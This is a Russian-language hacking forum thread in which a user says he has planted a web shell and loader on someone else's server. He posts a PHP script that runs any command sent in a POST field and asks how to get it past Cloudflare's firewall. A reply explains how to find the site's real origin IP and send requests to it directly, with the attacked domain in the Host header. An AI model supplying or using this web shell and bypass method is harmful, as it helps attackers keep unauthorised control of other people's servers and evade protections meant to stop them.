Старый 11.02.2020, 22:25   #1
who
 
Регистрация: 11.02.2020
Сообщений: 1
Репутация: 0
Question Прошу помощи с обходом Cloudflare

Доброго времени суток.
Ситуация следующая - окольными путям залил шелл и загрузчик. Его (шелл) снесли, но остался загрузчик. Через загрузчик удалось залить обычный консольный скрипт:
Код:
<?php
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>
Грузятся и обычные скрипты, но при любом взаимодействии с ними натыкаюсь на https://ibb.co/DLH81Wr
Обычные команды вида: ls , whoami - работают и отдают данные.
Однако ls -la уже не работает и выдаёт блокировку.
Вопросы в следующем:
Как обойти данную ошибку? Есть ли варианты web-shell для таких ситуаций? Или хотя бы вариант использования стандартных комманд?
Особыми техническими навыками не обладаю, а посему надеюсь на помощь знающих ребят.
Заранее благодарю за ответ.
who вне форума   Ответить с цитированием
Старый 12.03.2020, 10:00   #2
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Ищи реальный ip сервера, например можешь пробить тут
http://crimeflare.org:82/cfs.html
waf cloudflare блочит запросы.
Потом работай с ip как с обычным доменом, только в хедере host укажи атакуемый домен.
(если ты с винды, то в файле $:\Windows\System32\drivers\etc\hosts назначь "сайт ip")
Будет
https://127.786.986.111/script?cmd=ls%20-la
Вообще гугли cloudflare bypass, методов много.
Consistent вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot